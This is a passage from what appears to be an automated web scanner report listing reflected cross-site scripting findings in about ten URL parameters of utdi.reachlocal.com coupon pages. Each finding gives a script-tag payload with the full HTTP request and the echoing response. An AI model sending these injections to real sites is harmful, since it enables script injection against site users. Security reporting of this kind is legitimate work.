P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3043
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:00 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargi
...[SNIP]...
|
2.58. http://utdi.reachlocal.com/coupon/ [pub_cr_id parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d06"><script>alert(1)</script>76c9d147fa9 was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:16 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3061
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:09 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...
|
2.59. http://utdi.reachlocal.com/coupon/ [rl_key parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d92f9"><script>alert(1)</script>de87c2b7e5 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:55 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3015
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:48 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin
...[SNIP]...
|
2.60. http://utdi.reachlocal.com/coupon/ [scid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6519"><script>alert(1)</script>c8b035ec73b was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3056
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i
...[SNIP]...
|
2.61. http://utdi.reachlocal.com/coupon/ [se_refer parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61005"><script>alert(1)</script>ee0a10336fd was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:12 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 2891
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:05 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...
|
2.62. http://utdi.reachlocal.com/coupon/ [tc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3305c"><script>alert(1)</script>2dc212c00e9 was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:51 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3047
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv
...[SNIP]...
|
2.63. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [cid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2e"><script>alert(1)</script>2688833dcab was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:52 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2
...[SNIP]...
|
2.64. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [dynamic_proxy parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846db"><script>alert(1)</script>3e97297b77d was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:00 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:53 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top"
...[SNIP]...
|
2.65. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [kw parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8930"><script>alert(1)</script>784bb32d3 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:58 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3259
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:51 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
...[SNIP]...
|
2.66. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790de"><script>alert(1)</script>9051fd7fffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3269
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:04 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&prima
...[SNIP]...
|
2.67. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [primary_serv parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fcc"><script>alert(1)</script>222f71544b5 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
